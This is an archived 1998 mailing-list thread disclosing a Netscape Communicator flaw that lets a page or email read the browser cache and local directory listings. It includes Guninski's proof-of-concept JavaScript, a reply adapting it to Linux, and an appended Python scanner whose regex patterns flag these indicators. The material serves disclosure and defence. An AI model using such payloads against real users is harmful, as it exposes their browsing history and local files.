Hello,

Just wanted to add that Netscape Communicator 4.5b2 on Slackware Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get the script to read my cache. As for the local reading, with a little modification, it'll do that too.

Example: the line in George's script that reads local files is:

sl=window.open('wysiwyg://1/file:///c|/');

With just a little change, taking the Linux directory structure into consideration and adding proper backslash escapes:

sl=window.open('wysiwyg://1/file://\/');

That'll give you a listing of '/' on the local box. (tsk, tsk, tsk)

Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife

On Wed, 28 Oct 1998, Georgi Guninski wrote:

> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading user's cache (the urls the user has
> visited, including the info in GET forms). Reading local directories content
> is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
> Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
> Directory reading: http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
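An added detection example, not part of either message in this thread: a small Python scanner a mail gateway or proxy could run over HTML bodies to flag the two indicators the posts describe, window.open() calls aimed at wysiwyg://, about:cache or file: targets, and a location assignment to a javascript: URL. The sample body is constructed here from the quoted lines plus one benign call; the function names are my own.

```python
import re

# Constructed sample: an HTML mail body carrying the window.open() calls
# quoted in the thread, plus a benign http:// call for contrast.
SAMPLE_HTML = """<html><body>
<script>
sl=window.open('wysiwyg://1/about:cache');
sl2=sl.window.open();
sl2.location="javascript:function f() {return 'x'};f()";
</script>
<script>
sl=window.open('wysiwyg://1/file://\\/');
</script>
<script>
w=window.open('http://www.example.com/');
</script>
</body></html>"""

# Pull the body of each <script> block (case-insensitive, multi-line).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# window.open('<literal>' ...) with a quoted first argument only; the
# argument-less sl.window.open() in the sample deliberately does not match.
OPEN_RE = re.compile(r"""window\.open\(\s*(['"])(.*?)\1""", re.I)
# <something>.location = "javascript:..." assignments.
LOCATION_JS_RE = re.compile(r"""\.location\s*=\s*(['"])javascript:""", re.I)

# Targets a remote page has no business opening; the wysiwyg:// wrapper is
# what let the 4.x browsers reach about:cache and file: in the first place.
SUSPECT_PREFIXES = ("wysiwyg://", "about:cache", "file:")


def find_indicators(html):
    """Return a list of (kind, value) findings over every <script> block."""
    findings = []
    for block in SCRIPT_RE.findall(html):
        for m in OPEN_RE.finditer(block):
            target = m.group(2)
            if target.lower().startswith(SUSPECT_PREFIXES):
                findings.append(("window.open", target))
        if LOCATION_JS_RE.search(block):
            findings.append(("location=javascript:", None))
    return findings


if __name__ == "__main__":
    for kind, value in find_indicators(SAMPLE_HTML):
        print(kind, value)
```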
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:21:30 PDT